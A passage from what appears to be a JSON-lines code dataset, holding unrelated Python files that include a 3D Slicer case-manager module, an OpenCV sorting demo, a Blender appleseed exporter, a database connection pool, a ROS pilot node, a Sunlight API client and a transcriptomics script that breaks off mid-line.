self.caseWatchBox.reset()\n\n @property\n def generatedOutputDirectory(self):\n return self._generatedOutputDirectory\n\n @generatedOutputDirectory.setter\n def generatedOutputDirectory(self, path):\n if not os.path.exists(path):\n self.logic.createDirectory(path)\n exists = os.path.exists(path)\n self._generatedOutputDirectory = path if exists else \"\"\n self.completeCaseButton.enabled = exists and not self.logic.caseCompleted\n \n @property\n def mainGUIGroupBox(self):\n return self._mainGUIGroupBox\n\n @property\n def collapsibleDirectoryConfigurationArea(self):\n return self._collapsibleDirectoryConfigurationArea\n \n def __init__(self, parent=None):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n self.logic = SlicerCaseManagerLogic()\n self.modulePath = os.path.dirname(slicer.util.modulePath(self.moduleName))\n self._currentCaseDirectory = None\n self._caseDirectoryList = {}\n self.caseDirectoryList = {\"DICOM/Preop\", \"Results\"}\n\n def setup(self):\n #ScriptedLoadableModuleWidget.setup(self)\n\n self._mainGUIGroupBox = 
qt.QGroupBox()\n self._collapsibleDirectoryConfigurationArea = ctk.ctkCollapsibleButton()\n self.mainGUIGroupBoxLayout = qt.QGridLayout()\n self._mainGUIGroupBox.setLayout(self.mainGUIGroupBoxLayout)\n self.createNewCaseButton = self.createButton(\"New case\")\n self.openCaseButton = self.createButton(\"Open case\")\n self.closeCaseButton = self.createButton(\"Close case\", toolTip=\"Close case without completing it\", enabled=False)\n self.completeCaseButton = self.createButton('Case completed', enabled=True)\n self.mainGUIGroupBoxLayout.addWidget(self.createNewCaseButton, 1, 0)\n self.mainGUIGroupBoxLayout.addWidget(self.openCaseButton, 1, 1)\n self.mainGUIGroupBoxLayout.addWidget(self.completeCaseButton, 1, 2)\n \n self.createPatientWatchBox()\n #self.createIntraopWatchBox()\n self.createCaseInformationArea()\n self.setupConnections()\n self.layout.addWidget(self._mainGUIGroupBox)\n\n \n def updateOutputFolder(self):\n if os.path.exists(self.generatedOutputDirectory):\n return\n if self.patientWatchBox.getInformation(\"PatientID\") != '' \\\n and self.intraopWatchBox.getInformation(\"StudyDate\") != '':\n if self.outputDir and not os.path.exists(self.outputDir):\n self.logic.createDirectory(self.outputDir)\n finalDirectory = self.patientWatchBox.getInformation(\"PatientID\") + \"-biopsy-\" + \\\n str(qt.QDate().currentDate()) + \"-\" + qt.QTime().currentTime().toString().replace(\":\", \"\")\n self.generatedOutputDirectory = os.path.join(self.outputDir, finalDirectory, \"MRgBiopsy\")\n else:\n self.generatedOutputDirectory = \"\"\n\n def createPatientWatchBox(self):\n self.patientWatchBoxInformation = [WatchBoxAttribute('PatientID', 'Patient ID: ', DICOMTAGS.PATIENT_ID),\n WatchBoxAttribute('PatientName', 'Patient Name: ', DICOMTAGS.PATIENT_NAME),\n WatchBoxAttribute('DOB', 'Date of Birth: ', DICOMTAGS.PATIENT_BIRTH_DATE),\n WatchBoxAttribute('StudyDate', 'Preop Study Date: ', DICOMTAGS.STUDY_DATE)]\n self.patientWatchBox = DICOMBasedInformationWatchBox(self.patientWatchBoxInformation)\n self.layout.addWidget(self.patientWatchBox)\n \n def createIntraopWatchBox(self):\n intraopWatchBoxInformation = [WatchBoxAttribute('StudyDate', 'Intraop Study Date: ', DICOMTAGS.STUDY_DATE),\n WatchBoxAttribute('CurrentSeries', 'Current Series: ', [DICOMTAGS.SERIES_NUMBER,\n DICOMTAGS.SERIES_DESCRIPTION])]\n self.intraopWatchBox = DICOMBasedInformationWatchBox(intraopWatchBoxInformation)\n self.registrationDetailsButton = self.createButton(\"\", styleSheet=\"border:none;\",\n maximumWidth=16)\n self.layout.addWidget(self.intraopWatchBox)\n \n def createCaseInformationArea(self):\n self.casesRootDirectoryButton = self.createDirectoryButton(text=\"Choose cases root location\",\n caption=\"Choose cases root location\",\n directory=self.getSetting('CasesRootLocation'))\n self.createCaseWatchBox()\n self._collapsibleDirectoryConfigurationArea.collapsed = True\n self._collapsibleDirectoryConfigurationArea.text = \"Case Directory Settings\"\n self.directoryConfigurationLayout = qt.QGridLayout(self._collapsibleDirectoryConfigurationArea)\n self.directoryConfigurationLayout.addWidget(qt.QLabel(\"Cases Root Directory\"), 1, 0, 1, 1)\n self.directoryConfigurationLayout.addWidget(self.casesRootDirectoryButton, 1, 1, 1, 1)\n self.directoryConfigurationLayout.addWidget(self.caseWatchBox, 2, 0, 1, qt.QSizePolicy.ExpandFlag)\n self.layout.addWidget(self._collapsibleDirectoryConfigurationArea)\n\n def createCaseWatchBox(self):\n watchBoxInformation = [WatchBoxAttribute('CurrentCaseDirectory', 'Directory')]\n 
self.caseWatchBox = BasicInformationWatchBox(watchBoxInformation, title=\"Current Case\")\n\n\n def setupConnections(self):\n self.createNewCaseButton.clicked.connect(self.onCreateNewCaseButtonClicked)\n self.openCaseButton.clicked.connect(self.onOpenCaseButtonClicked)\n self.casesRootDirectoryButton.directoryChanged.connect(lambda: setattr(self, \"caseRootDir\",\n self.casesRootDirectoryButton.directory))\n self.completeCaseButton.clicked.connect(self.onCompleteCaseButtonClicked)\n self.closeCaseButton.clicked.connect(self.clearData)\n\n def onCreateNewCaseButtonClicked(self):\n if not self.checkAndWarnUserIfCaseInProgress():\n return\n self.clearData()\n self.caseDialog = NewCaseSelectionNameWidget(self.caseRootDir)\n selectedButton = self.caseDialog.exec_()\n if selectedButton == qt.QMessageBox.Ok:\n newCaseDirectory = self.caseDialog.newCaseDirectory\n os.mkdir(newCaseDirectory)\n for directory in self.caseDirectoryList:\n subDirectory = directory.split(\"/\")\n for iIndex in range(len(subDirectory)+1):\n fullPath = \"\"\n for jIndex in range(iIndex):\n fullPath = os.path.join(fullPath,subDirectory[jIndex])\n if not os.path.exists(os.path.join(newCaseDirectory,fullPath)): \n os.mkdir(os.path.join(newCaseDirectory,fullPath)) \n self.currentCaseDirectory = newCaseDirectory \n self.startPreopDICOMReceiver()\n \n def onCompleteCaseButtonClicked(self):\n self.logic.caseCompleted = True\n shutil.rmtree(os.path.join(self.currentCaseDirectory, \"Results\"))\n slicer.util.saveScene(os.path.join(self.currentCaseDirectory, \"Results\"))\n self.clearData()\n \n def onOpenCaseButtonClicked(self):\n if not self.checkAndWarnUserIfCaseInProgress():\n return\n slicer.mrmlScene.Clear(0)\n path = qt.QFileDialog.getExistingDirectory(self.parent.window(), \"Select Case Directory\", self.caseRootDir)\n if not path:\n return\n self.currentCaseDirectory = path\n if (not os.path.exists(os.path.join(path, \"DICOM\", \"Preop\")) ) or (not os.path.exists(os.path.join(path, \"Results\")) ):\n slicer.util.warningDisplay(\"The selected case directory seems not to be valid\", windowTitle=\"\")\n self.clearData()\n else:\n #slicer.util.loadVolume(self.preopImagePath, returnNode=True)\n slicer.util.loadScene(os.path.join(path, \"Results\",\"Results.mrml\"))\n\n def checkAndWarnUserIfCaseInProgress(self):\n proceed = True\n if self.currentCaseDirectory is not None:\n if not slicer.util.confirmYesNoDisplay(\"Current case will be closed. Do you want to proceed?\"):\n proceed = False\n return proceed\n\n def startPreopDICOMReceiver(self):\n self.preopTransferWindow = IncomingDataWindow(incomingDataDirectory=self.preopDICOMDataDirectory,\n skipText=\"No Preop available\")\n self.preopTransferWindow.addObserver(SlicerProstateEvents.IncomingDataSkippedEvent,\n self.continueWithoutPreopData)\n self.preopTransferWindow.addObserver(SlicerProstateEvents.IncomingDataCanceledEvent,\n self.onPreopTransferMessageBoxCanceled)\n self.preopTransferWindow.addObserver(SlicerProstateEvents.IncomingDataReceiveFinishedEvent,\n self.startPreProcessingPreopData)\n self.preopTransferWindow.show()\n \n def continueWithoutPreopData(self, caller, event):\n self.cleanupPreopDICOMReceiver()\n self.simulatePreopPhaseButton.enabled = False\n self.simulateIntraopPhaseButton.enabled = True\n \n def cleanupPreopDICOMReceiver(self):\n if self.preopTransferWindow:\n self.preopTransferWindow.hide()\n self.preopTransferWindow.removeObservers()\n self.preopTransferWindow = None\n \n def onPreopTransferMessageBoxCanceled(self, caller, event):\n self.clearData()\n pass\n\n def startPreProcessingPreopData(self, caller=None, event=None):\n self.cleanupPreopDICOMReceiver()\n ## to do, use mpreview to process the dicom series\n ## here it only loads the volumes in the directory\n for subdir, dirs, files in os.walk(self.preopDICOMDataDirectory):\n for file in files:\n if not file[0] == \".\":\n slicer.util.loadVolume(os.path.join(self.preopDICOMDataDirectory, file))\n \n pass\n\n\n def loadCaseData(self):\n\n pass\n \n def clearData(self):\n pass\n\nclass SlicerCaseManagerLogic(ScriptedLoadableModuleLogic):\n \n @property\n def caseCompleted(self):\n return self._caseCompleted\n\n @caseCompleted.setter\n def caseCompleted(self, value):\n self._caseCompleted = value\n if value is True:\n self.stopSmartDICOMReceiver()\n \n def __init__(self):\n ScriptedLoadableModuleLogic.__init__(self)\n self.caseCompleted = True\n self.DEFAULT_JSON_FILE_NAME = \"results.json\"\n \n def stopSmartDICOMReceiver(self):\n self.smartDicomReceiver = getattr(self, \"smartDicomReceiver\", None)\n if self.smartDicomReceiver:\n self.smartDicomReceiver.stop()\n self.smartDicomReceiver.removeObservers()\n \n def closeCase(self, directory):\n self.stopSmartDICOMReceiver()\n if os.path.exists(directory):\n self.caseCompleted = False\n if self.getDirectorySize(directory) == 0:\n shutil.rmtree(directory)\n \n def hasCaseBeenCompleted(self, directory):\n self.caseCompleted = False\n filename = os.path.join(directory, self.DEFAULT_JSON_FILE_NAME)\n if not os.path.exists(filename):\n return\n with open(filename) as data_file:\n data = json.load(data_file)\n self.caseCompleted = data[\"completed\"]\n return self.caseCompleted\n \nclass NewCaseSelectionNameWidget(qt.QMessageBox, ModuleWidgetMixin):\n\n PREFIX = \"Case\"\n SUFFIX = \"-\" + datetime.date.today().strftime(\"%Y%m%d\")\n SUFFIX_PATTERN = \"-[0-9]{8}\"\n CASE_NUMBER_DIGITS = 3\n PATTERN = PREFIX+\"[0-9]{\"+str(CASE_NUMBER_DIGITS-1)+\"}[0-9]{1}\"+SUFFIX_PATTERN\n\n def __init__(self, destination, parent=None):\n super(NewCaseSelectionNameWidget, self).__init__(parent)\n if not os.path.exists(destination):\n raise IOError(\"Case root directory does not exist: \" + destination)\n self.destinationRoot = destination\n self.newCaseDirectory = None\n self.minimum = self.getNextCaseNumber()\n self.setupUI()\n self.setupConnections()\n self.onCaseNumberChanged(self.minimum)\n\n def getNextCaseNumber(self):\n import re\n caseNumber = 0\n for dirName in [dirName for dirName in os.listdir(self.destinationRoot)\n if os.path.isdir(os.path.join(self.destinationRoot, dirName)) and re.match(self.PATTERN, dirName)]:\n number = int(re.split(self.SUFFIX_PATTERN, dirName)[0].split(self.PREFIX)[1])\n caseNumber = caseNumber if caseNumber > number else number\n return caseNumber+1\n\n def setupUI(self):\n self.setWindowTitle(\"Case Number Selection\")\n self.setText(\"Please select a case number for the new case.\")\n self.setIcon(qt.QMessageBox.Question)\n self.spinbox = qt.QSpinBox()\n self.spinbox.setRange(self.minimum, int(\"9\"*self.CASE_NUMBER_DIGITS))\n self.preview = qt.QLabel()\n self.notice = qt.QLabel()\n self.layout().addWidget(self.createVLayout([self.createHLayout([qt.QLabel(\"Proposed Case Number\"), self.spinbox]),\n self.preview, self.notice]), 2, 1)\n self.okButton = self.addButton(self.Ok)\n self.okButton.enabled = False\n self.cancelButton = self.addButton(self.Cancel)\n self.setDefaultButton(self.okButton)\n\n def setupConnections(self):\n self.spinbox.valueChanged.connect(self.onCaseNumberChanged)\n\n def onCaseNumberChanged(self, caseNumber):\n formatString = '%0'+str(self.CASE_NUMBER_DIGITS)+'d'\n caseNumber = formatString % caseNumber\n directory = self.PREFIX+caseNumber+self.SUFFIX\n self.newCaseDirectory = os.path.join(self.destinationRoot, directory)\n self.preview.setText(\"New case directory: \" + self.newCaseDirectory)\n self.okButton.enabled = not os.path.exists(self.newCaseDirectory)\n self.notice.text = \"\" if not os.path.exists(self.newCaseDirectory) else \"Note: Directory already exists.\"","sub_path":"VentriculostomyPlanning/SlicerCaseManager.py","file_name":"SlicerCaseManager.py","file_ext":"py","file_size_in_byte":17206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359189613","text":"import numpy as np, cv2\r\n\r\nm = np.random.randint(0, 100, 15).reshape(3, 5) # generate random integers\r\n\r\n## sort matrix elements\r\nsort1 = cv2.sort(m, cv2.SORT_EVERY_ROW) # row-wise (horizontal) ascending\r\nsort2 = cv2.sort(m, cv2.SORT_EVERY_COLUMN) # column-wise (vertical) ascending\r\nsort3 = cv2.sort(m, cv2.SORT_EVERY_ROW + cv2.SORT_DESCENDING) # row-wise descending\r\nsort4 = np.sort(m, axis=1) # sort along the x axis (horizontal)\r\nsort5 = np.sort(m, axis=0) # sort along the y axis (vertical)\r\nsort6 = np.sort(m, axis=1)[:, ::-1] # row-wise descending sort\r\n\r\ntitles = ['m', 'sort1', 'sort2', 'sort3', 'sort4', 'sort5', 'sort6']\r\nfor title in titles:\r\n print(\"[%s] = \\n%s\\n\" % (title, eval(title)))","sub_path":"CHAPTER5/5-13.sort.py","file_name":"5-13.sort.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"358830768","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plot_result(result, label, show=False):\n scores = sort_results_for_plotting(list(result.values()))\n scores = np.array(scores)\n x = scores[:, 0]\n y = scores[:, 1]\n line, = plt.plot(x, y, '-o', label=label)\n if show:\n plt.show()\n return line\n\n\ndef plot_results(result_summaries):\n x_label = result_summaries[0][\"accuracy_metric\"]\n y_label = \"1 - \" + result_summaries[0][\"fairness_metric\"]\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n lines = []\n for result_summary in result_summaries:\n lines.append(plot_result(result_summary[\"result\"], result_summary[\"name\"]))\n plt.legend(handles=lines)\n plt.show()\n\n\ndef sort_results_for_plotting(scores):\n return sorted(scores, key=lambda x:
x[1])\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213797344","text":"#\n# This source file is part of appleseed.\n# Visit https://appleseedhq.net/ for additional information and resources.\n#\n# This software is released under the MIT license.\n#\n# Copyright (c) 2014-2018 The appleseedhq Organization\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport bpy\nfrom bpy.props import BoolProperty, StringProperty\nfrom bpy_extras.io_utils import ExportHelper\n\nfrom .utils import util\nfrom .translators import SceneTranslator\n\n\nclass ExportAppleseedScene(bpy.types.Operator, ExportHelper):\n \"\"\"\n Export the scene to an appleseed project on disk.\n \"\"\"\n\n bl_idname = \"appleseed.export_scene\"\n bl_label = \"Export appleseed Scene\"\n bl_options = {'PRESET'}\n\n filename_ext = \".appleseed\"\n filter_glob = StringProperty(default=\"*.appleseed\", options={'HIDDEN'})\n\n # Properties.\n\n animation = BoolProperty(name=\"Animation\", description=\"Write out an appleseed project for each frame\", default=False)\n\n # selected_only = BoolProperty(name=\"Selection Only\", description=\"Export selected objects only\", default=False)\n # packed = BoolProperty(name=\"Pack Project\", description=\"Export packed projects\", default=False)\n\n @classmethod\n def poll(cls, context):\n renderer = context.scene.render\n return renderer.engine == 'APPLESEED_RENDER'\n\n def execute(self, context):\n export_path = util.realpath(self.filepath)\n\n scene = context.scene\n\n if self.animation:\n\n if not '#' in export_path:\n self.report(\n {'ERROR'},\n 'Exporting animation but project filename has no # frame placeholders.')\n return {'CANCELLED'}\n\n replacements = [\n ('######', \"%06d\"),\n ('#####', \"%05d\"),\n ('####', \"%04d\"),\n ('###', \"%03d\"),\n ('##', \"%02d\"),\n ('#', \"%d\")\n ]\n\n for i in replacements:\n if i[0] in export_path:\n export_path = export_path.replace(i[0], i[1])\n break\n\n frame_start = scene.frame_start\n frame_end = scene.frame_end\n\n for frame in range(frame_start, frame_end + 1):\n scene.frame_set(frame)\n proj_filename = export_path % frame\n self.__export_project(context, proj_filename)\n\n else:\n self.__export_project(context, export_path)\n\n return {'FINISHED'}\n\n def __export_project(self, context, export_path):\n scene_translator = 
SceneTranslator.create_project_export_translator(context.scene, export_path)\n scene_translator.translate_scene()\n scene_translator.write_project(export_path)\n\n\ndef menu_func_export_scene(self, context):\n self.layout.operator(ExportAppleseedScene.bl_idname, text=\"appleseed (.appleseed)\")\n\n\ndef register():\n util.safe_register_class(ExportAppleseedScene)\n bpy.types.INFO_MT_file_export.append(menu_func_export_scene)\n\n\ndef unregister():\n bpy.types.INFO_MT_file_export.remove(menu_func_export_scene)\n util.safe_unregister_class(ExportAppleseedScene)\n","sub_path":"export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"342659359","text":"import unittest\nimport sys\n\nundertest = __import__(sys.argv[-1].split(\".py\")[0])\najeita_lista = getattr(undertest, 'ajeita_lista', None)\n\nclass PublicTests(unittest.TestCase):\n\n def test_do_enunciado(self):\n lista1 = [3,2,1,4,5,6,7,8,9]\n assert ajeita_lista(lista1) == None\n assert lista1 == [8, 6, 4, 2, 1, 3, 5, 7, 9]\n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","sub_path":"Unidade7/ajeita_lista/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139696662","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#\n# Author : wh\n# E-mail : wh_linux@126.com\n# Date : 14/07/09 14:26:38\n# Desc :\n#\nfrom __future__ import absolute_import\n\nimport logging\n\nfrom fbook.util import torndb\n\n_conn = None\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass _Connector(object):\n \"\"\" Proxies calls on a database connection\n \"\"\"\n def __init__(self, conn, pool):\n self._conn = conn\n self._pool = pool\n self._closed = False\n\n def __getattr__(self, name):\n if self._closed:\n raise Exception(\"Connection has closed\")\n\n if self._conn:\n return getattr(self._conn, name)\n\n def close(self):\n \"\"\" Close the connection; returns True if it was really closed, False if it was only put back into the pool\n \"\"\"\n self._closed = True\n #XXX the logger may already have been cleaned up during interpreter shutdown\n if logger is not None:\n logger.debug(\"Close the connection...\")\n\n if self._conn not in self._pool._connections:\n if logger is not None:\n logger.debug(\"Connection is not in the pool close it: %s\",\n self._conn)\n self._conn.close()\n return True\n else:\n if logger is not None:\n logger.debug(\"Connection is in the pool put it in idle\"\n \" connections: %s\", self._conn)\n self._pool._idle_connections.append(self._conn)\n return False\n\n def __del__(self):\n if not self._closed:\n self.close()\n\n\nclass ConnectionPool(object):\n \"\"\" Database connection pool: if the connection limit has not been reached, create a connection and put it back into the pool after use;\n otherwise create a temporary connection that is closed after use\n \"\"\"\n\n def __init__(self, max_num=10, *args, **kwargs):\n self.max_num = max_num\n\n self._connections = []\n self._idle_connections = []\n self._closed = False\n self._args, self._kwargs = args, kwargs\n\n def _create(self):\n return torndb.Connection(*self._args, **self._kwargs)\n\n def _ping(self, conn, reconnect=True):\n try:\n alive = conn._db.ping()\n except Exception:\n logger.warn(\"ping database error\", exc_info=True)\n alive = False\n\n if alive is None:\n alive = True\n\n if not alive and reconnect:\n try:\n _conn = self._create()\n except Exception:\n logger.warn(\"create database connect error\", exc_info=True)\n return None\n else:\n if conn in self._connections:\n self._connections.remove(conn)\n self._connections.append(_conn)\n conn = _conn\n return conn\n\n def connection(self):\n if self._idle_connections:\n conn = self._idle_connections.pop(0)\n conn = self._ping(conn)\n if conn is None:\n raise Exception(\"Could not revive idle database connection\")\n logger.debug(\"Got connection from idle connections:%s\", conn)\n else:\n conn = self._create()\n logger.debug(\"Create a new connection: %s\", conn)\n if len(self._connections) < self.max_num:\n logger.debug(\"Pool is not full %s/%s, put it in the pool\",\n len(self._connections), self.max_num)\n self._connections.append(conn)\n else:\n logger.debug(\"Pool was full %s/%s, make it temporary\",\n self.max_num, self.max_num)\n return _Connector(conn, self)\n\n def close(self):\n \"\"\" Close idle connections and empty the pool\n \"\"\"\n self._closed = True\n\n if logger is not None:\n logger.debug(\"Close the pool...\")\n\n for connect in self._idle_connections:\n\n if logger is not None:\n logger.debug(\"Close the idle connections: %s\", connect)\n\n connect.close()\n\n self._idle_connections = []\n self._connections = []\n\n def __del__(self):\n if not self._closed:\n self.close()\n","sub_path":"fbook/data/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447348879","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport math\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\n\nfrom b2_logic.nodes.pilot import PilotNode, PVelocityController\nfrom b2.msg import Proximity\n\n\nDEFAULT_NODE_NAME = \"pilot_node\"\n\n# Subscribes\nDEFAULT_PROXIMITY_TOPIC = \"ir_sensors/proximity\"\nDEFAULT_ODOMETRY_TOPIC = \"base_node/odom\"\n\n# Publishes\nDEFAULT_CMD_TOPIC = \"base_node/cmd_vel\"\n\nDEFAULT_LOOP_HZ = 5 # hertz\nDEFAULT_MAX_FWD_SPEED = 0.5 # m/sec\nDEFAULT_MIN_FWD_SPEED = 0.1 # m/sec\nDEFAULT_MAX_TURN_SPEED = math.pi / 4 # radians/sec\nDEFAULT_MIN_TURN_SPEED = 0.1 # radians/sec\nDEFAULT_TURN_DEGREES = 90 # degrees, will be converted to radians\nDEFAULT_TURN_DEGREE_TOLERANCE = 5 # degrees, will be converted to radians\nDEFAULT_LINEAR_K = 1\nDEFAULT_ANGULAR_K = 1 # K constant for angular P controller\n\n\nif __name__ == \"__main__\":\n rospy.init_node(DEFAULT_NODE_NAME, log_level=rospy.DEBUG)\n\n node_name = rospy.get_name()\n loophz = rospy.get_param(\"~loop_hz\", DEFAULT_LOOP_HZ)\n max_fwd_speed = rospy.get_param(\"~max_fwd_speed\", DEFAULT_MAX_FWD_SPEED)\n min_fwd_speed = rospy.get_param(\"~min_fwd_speed\", DEFAULT_MIN_FWD_SPEED)\n max_turn_speed = rospy.get_param(\"~max_turn_speed\", DEFAULT_MAX_TURN_SPEED)\n min_turn_speed = rospy.get_param(\"~min_turn_speed\", DEFAULT_MIN_TURN_SPEED)\n turn_radians = math.radians(rospy.get_param(\"~turn_degrees\", DEFAULT_TURN_DEGREES))\n turn_radians_tolerance = math.radians(\n rospy.get_param(\"~turn_degree_tolerance\", DEFAULT_TURN_DEGREE_TOLERANCE))\n linear_k = rospy.get_param(\"~linear_k\", DEFAULT_LINEAR_K)\n angular_k = rospy.get_param(\"~angular_k\", DEFAULT_ANGULAR_K)\n\n # P-Controller\n pcontroller = PVelocityController(\n min_fwd_speed, max_fwd_speed,\n min_turn_speed, max_turn_speed,\n linear_k=linear_k, angular_k=angular_k\n )\n\n # Publishes\n cmd_vel_pub = rospy.Publisher(\n rospy.get_param('~cmd_topic', DEFAULT_CMD_TOPIC),\n Twist,\n queue_size=1\n )\n\n node = PilotNode(loophz, turn_radians, turn_radians_tolerance, cmd_vel_pub, pcontroller)\n\n # Subscribes\n rospy.Subscriber(\n
rospy.get_param(\"~proximity_topic\", DEFAULT_PROXIMITY_TOPIC),\n Proximity,\n node.prox_callback\n )\n\n # Subscribes\n rospy.Subscriber(\n rospy.get_param(\"~odom_topic\", DEFAULT_ODOMETRY_TOPIC),\n Odometry,\n node.odom_callback\n )\n\n node.run()\n","sub_path":"nodes/pilot_node.py","file_name":"pilot_node.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"96135332","text":"# Copyright (c) Sunlight Labs, 2012 under the terms and conditions\n# of the LICENSE file.\n\n\"\"\"\n.. module:: sunlight.service\n :synopsis: Sunlight API Superclass\n\nBase service class. All API classes (such as say -\n:class:`sunlight.services.openstates.OpenStates`) inherit from this.\n\"\"\"\nimport sys\n\nimport sunlight.config\nimport sunlight.errors\n\nif sys.version_info[0] >= 3:\n from urllib.parse import urlencode\n from urllib.request import urlopen\n from urllib.error import HTTPError\n _str_type = str\nelse:\n from urllib import urlencode\n from urllib2 import urlopen\n from urllib2 import HTTPError\n _str_type = basestring\n\n\ndef safe_encode(kwargs):\n kwargs = kwargs.copy()\n for k, v in kwargs.iteritems():\n if isinstance(v, _str_type):\n kwargs[k] = v.encode('utf8')\n return urlencode(kwargs)\n\n\nclass Service:\n \"\"\"\n Base class for all the API implementations, as well as a bunch of common\n code on how to actually fetch text over the network.\n \"\"\"\n\n def get(self, top_level_object, **kwargs):\n \"\"\"\n Get some data from the network - this is where we actually fetch\n something and make a request.\n\n .. warning:: Be sure that API_KEY was set before calling this method.\n This will throw a :class:`sunlight.errors.NoAPIKeyException` if\n the API_KEY is not set.\n\n args:\n ``top_level_object`` (str): Thing to query for (such as say,\n \"bills\" for OpenStates )\n\n kwargs:\n These arguments will be passed to the underlying API implementation\n to help create a query. Validation will happen down below, and\n on a per-API level.\n \"\"\"\n if not sunlight.config.API_KEY:\n raise sunlight.errors.NoAPIKeyException(\n \"Warning: Missing API Key. 
please visit \" +\n sunlight.config.API_SIGNUP_PAGE +\n \" to register for a key.\"\n )\n\n url = self._get_url(top_level_object, sunlight.config.API_KEY,\n **kwargs)\n try:\n r = urlopen(url)\n return_data = r.read().decode('utf8')\n return self._decode_response(return_data)\n except HTTPError as e:\n message = e.read()\n code = e.getcode()\n\n ex = sunlight.errors.BadRequestException(\"Error (%s) -- %s\" % (\n code, message\n ))\n\n ex.url = e.geturl()\n ex.message = message\n ex.code = code\n\n raise ex\n","sub_path":"data_analysis/Mar2013/build/sunlight/build/lib.linux-x86_64-2.7/sunlight/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92023377","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom os import listdir\nimport numpy as np\n\ndef dataframe_diff_expression(time='T2', strain_base='WT'):\n \"\"\"\n Returns a dataframe with differential expression with respect to strain_base.\n \"\"\"\n df_out = None\n if time == 'T1':\n scen=['WT_T1', 'pkt_T1', 'goret_T1', 'Saccha_T1', 'gap_T1']\n elif time == 'T2':\n scen=['WT_T2', 'pkt_T2', 'goret_T2', 'Saccha_T2', 'gap_T2']\n \n scen.remove(strain_base+'_'+time)\n wd_data = '/Users/aalarcon/Documents/Data/IBN-Transcriptomique-7/HELIXIO/Isoforms-diff/'\n data_files = listdir(wd_data)\n \n for s in scen:\n name1 = 'Isoforms_Diff_Samples_' + s + '_vs_' + strain_base + '_' + time + '.xlsx'\n name2 = 'Isoforms_Diff_Samples_' + strain_base + '_' + time + '_vs_' + s + '.xlsx'\n if data_files.count(name1) == 1:\n tr_data = pd.read_excel(wd_data + name1, index_col=1)\n \n elif data_files.count(name2) == 1:\n tr_data = pd.read_excel(wd_data + name2, index_col=1)\n else:\n tr_data = None\n print('Error !!!!!!!!!!!!! no file found for', s2, ' vs ', s1)\n \n tr_data.columns = [c.replace(' ','').replace('[','').replace(']','').replace('FPKM','') \n for c in tr_data.columns]\n \n if df_out is None:\n df_out = pd.DataFrame(index=tr_data.index)\n df_out['Gene_name'] = tr_data['Gene_name']\n \n df_out[s] = 0\n\n for idx in tr_data.index:\n if tr_data.q_value.loc[idx] <= 0.05:\n if tr_data[s].loc[idx] > tr_data[strain_base+'_'+time].loc[idx]:\n df_out.set_value(idx, s, 1)\n elif tr_data[s].loc[idx] < tr_data[strain_base+'_'+time].loc[idx]:\n df_out.set_value(idx, s, -1)\n return df_out\n \n \n\ndef comp_genes_transcripto(loci, time='T2', plot=False, title_plot=None):\n \"\"\"\n Compare transcriptomics of different genes given their locus.\n if arg plot=False, returns a dataframe, else returns nothing and plots the dataframe\n as a heatmap. Title of plot can be modified with title_plot argument.\n \"\"\"\n if time == 'T1':\n scen=['WT_T1', 'pkt_T1', 'goret_T1', 'Saccha_T1', 'gap_T1']\n elif time == 'T2':\n scen=['WT_T2', 'pkt_T2', 'goret_T2', 'Saccha_T2', 'gap_T2']\n df_comp = pd.DataFrame(index=['time']+scen[:-2], columns=scen, data=np.nan)\n wd_data = '/Users/aalarcon/Documents/Data/IBN-Transcriptomique-7/HELIXIO/Isoforms-diff/'\n data_files = listdir(wd_data)\n for s1 in scen:\n for s2 in scen[scen.index(s1)+1:]:\n name1 = 'Isoforms_Diff_Samples_' + s2 + '_vs_' + s1 + '.xlsx'\n name2 = 'Isoforms_Diff_Samples_' + s1 + '_vs_' + s2 + 